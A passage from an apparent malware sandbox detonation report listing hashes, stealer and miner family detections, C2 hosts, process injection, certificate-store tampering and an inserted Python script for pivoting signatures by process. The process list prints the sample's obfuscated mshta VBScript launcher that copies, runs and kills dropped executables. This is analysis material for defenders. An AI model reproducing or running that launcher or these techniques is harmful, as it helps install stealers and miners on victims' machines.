| SHA512 | d8d9d996e279b7500306614448d61d5c3ac9c2efc28ac71d1daa09951f342d2cf773f0a7b51cb847f4d91dd34018e4a2d7977c0f6f2859795d4f0df7ac894b27 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 29d6d6774a763d9ff493fd87c7c1a777 |
| SHA1 | a1c90149a906aaf22698ef7e40bb52266d96662a |
| SHA256 | 139e0e7875eadc77137f4f7b52cd63779011d9b1ca285516e2dd3c784790a153 |
| SHA512 | eb4740dfaf806c28a3547b8b9cb050737ff4e01588281881592273f362948f183ca6242acbf8b3657e513297803e1afa318e3ae41267c91e8c190854fc06f79c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
memory/2124-834-0x00000000009E0000-0x0000000000A72000-memory.dmp
memory/2124-861-0x0000000003E60000-0x0000000003EE6000-memory.dmp
memory/2092-922-0x0000000000400000-0x0000000000878000-memory.dmp
memory/2124-923-0x0000000000060000-0x0000000000061000-memory.dmp
memory/2124-925-0x0000000000070000-0x0000000000075000-memory.dmp
memory/2124-924-0x0000000000060000-0x0000000000063000-memory.dmp
memory/2684-938-0x000000013F630000-0x000000013F636000-memory.dmp
C:\Config.Msi\f77c277.rbs
| MD5 | 9399e483f330ba22edbf122f3b7f56e9 |
| SHA1 | 52033f227a6f607e1b046a74908c545366e1d96a |
| SHA256 | 084a33c79436104d5b509d9ad1ae15cbf992f5a8a8c7231565e961beccafa688 |
| SHA512 | 6bdc8bd13e743c740e7ebc51ccf590b94c8f5f4f8a1ef2f2f6d4e5104c02dc4a967eb171e8fe6c89663732495d6c9a2167d43a395ec16f8be575f3217869396c |
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1044\background.jpg
| MD5 | 31e2eb815eb3a794b04a2a300f24c3b0 |
| SHA1 | ac129cfafe62d2dd77a95ce9cacd5b8e5bf4b4fa |
| SHA256 | 7686c3e3e78ba82914789e8e69781299d054a910710f004c774a20b5b123e2c1 |
| SHA512 | ffe4ddc06d278d61c7d8d827eb33184310f43fb86b1850a45e5b06ed6562564df33073158b336efd7f9ed417d0a7123d17c3b7f7fc914d06f628d7588f4380fb |
C:\Users\Admin\AppData\Local\Temp\f7873aa.exe
| MD5 | 99c8a5f7c87b4ec0ac66592a85e129f5 |
| SHA1 | 3699ef050962cfa6e3d6440a941396c9f022ea52 |
| SHA256 | 899c95d880933fc5a12f409c8e7821148ef0f9b4a28c226cb9cc6f44caacdbad |
| SHA512 | a3af8e0340d85cc0d83ed0824c98ff1de2aba7d73299ce47ab136df40c44ed34acd5e06d80d22a61b2963bd6c5586d80d446b205aa1e9ddad27b3ba4396b1b18 |
memory/1548-1166-0x0000000001020000-0x0000000001028000-memory.dmp
memory/1204-1197-0x0000000000A00000-0x0000000000A08000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-05 09:40
Reported
2024-12-05 09:42
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
Vidar
Vidar family
Xmrig family
xmrig
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3608 set thread context of 816 | N/A | C:\Users\Admin\AppData\Local\Temp\inst001.exe | C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv |
| PID 3240 set thread context of 3676 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI6D3C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7240.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI737B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e586b19.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7438.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e586b19.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI732B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI73AA.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7192.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI71D2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst001.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\lijun-game.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
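The signature tables in this run are keyed by signature, which hides the more useful view: which process did what. Pivoted by process, inst001.exe both reads the NLS Language key and sets the thread context of the dropped QTborv, and services64.exe (the logon-task binary) reads the Geo Nation key and sets the thread context of explorer.exe, the shape process hollowing or thread hijacking takes. The script below is an added example, not part of the sandbox report: it parses rows copied from the "Suspicious use of SetThreadContext", "Checks computer location settings", "System Location Discovery" and "Kills process with taskkill" tables above and pivots them by process. The split between OS binaries under C:\Windows and dropped files under AppData or Temp is an assumption made for this example.

```python
"""Added example, not part of the sandbox report: pivot the behavioral2
signature tables by process. SAMPLE_SIGNATURES is a subset of rows copied
from the report; the path classification is an assumption made here."""
from collections import defaultdict

# Signature name line followed by its table, as laid out in the report
# (constructed sample of the rows shown above).
SAMPLE_SIGNATURES = r"""
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3608 set thread context of 816 | N/A | C:\Users\Admin\AppData\Local\Temp\inst001.exe | C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv |
| PID 3240 set thread context of 3676 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst001.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
"""

HEADER = '| Description | Indicator | Process | Target |'


def parse_signature_tables(text):
    """Return (signature, description, indicator, process, target) tuples.
    A non-table line names the signature that the following rows belong to."""
    rows, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith('|'):
            current = line
            continue
        if line == HEADER or current is None:
            continue
        cells = [c.strip() for c in line.strip('|').split('|')]
        if len(cells) == 4:
            rows.append((current, *cells))
    return rows


def classify_path(path):
    """Assumed split: OS binaries under C:\\Windows versus files the sample dropped."""
    p = path.lower()
    if p.startswith('c:\\windows\\'):
        return 'os-binary'
    if '\\appdata\\' in p or '\\temp\\' in p:
        return 'dropped'
    return 'other'


def pivot_by_process(rows):
    """Process image -> set of signature names it triggered."""
    out = defaultdict(set)
    for sig, _desc, _ind, proc, _target in rows:
        if proc != 'N/A':
            out[proc].add(sig)
    return dict(out)


def injection_pairs(rows):
    """(source, target) for SetThreadContext rows whose target is a different
    image: the shape process hollowing and thread hijacking take."""
    return [(proc, target) for sig, _d, _i, proc, target in rows
            if sig == 'Suspicious use of SetThreadContext' and target not in ('N/A', proc)]


def rank(rows):
    """Dropped binaries first, then by number of distinct signatures, then by name."""
    pivot = pivot_by_process(rows)
    return sorted(pivot.items(),
                  key=lambda kv: (classify_path(kv[0]) != 'dropped', -len(kv[1]), kv[0]))


if __name__ == '__main__':
    parsed = parse_signature_tables(SAMPLE_SIGNATURES)
    for proc, sigs in rank(parsed):
        print(f'{classify_path(proc):10} {proc}: {sorted(sigs)}')
    for src, dst in injection_pairs(parsed):
        print(f'thread context rewritten: {src} -> {dst}')
```

The same pivot over the full tables (not only the subset copied here) is what turns a long signature list into a short list of images to pull from the sandbox for static analysis, and the injection pairs name the process whose memory, not disk image, holds the unpacked payload.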
System Time Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
C:\Users\Admin\AppData\Local\Temp\inst001.exe
"C:\Users\Admin\AppData\Local\Temp\inst001.exe"
C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7.exe
"C:\Users\Admin\AppData\Local\Temp\7.exe"
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp" /SL5="$90112,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
"C:\Users\Admin\AppData\Local\Temp\lijun-game.exe"
C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
"C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4348 -ip 4348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1860 -ip 1860
C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp
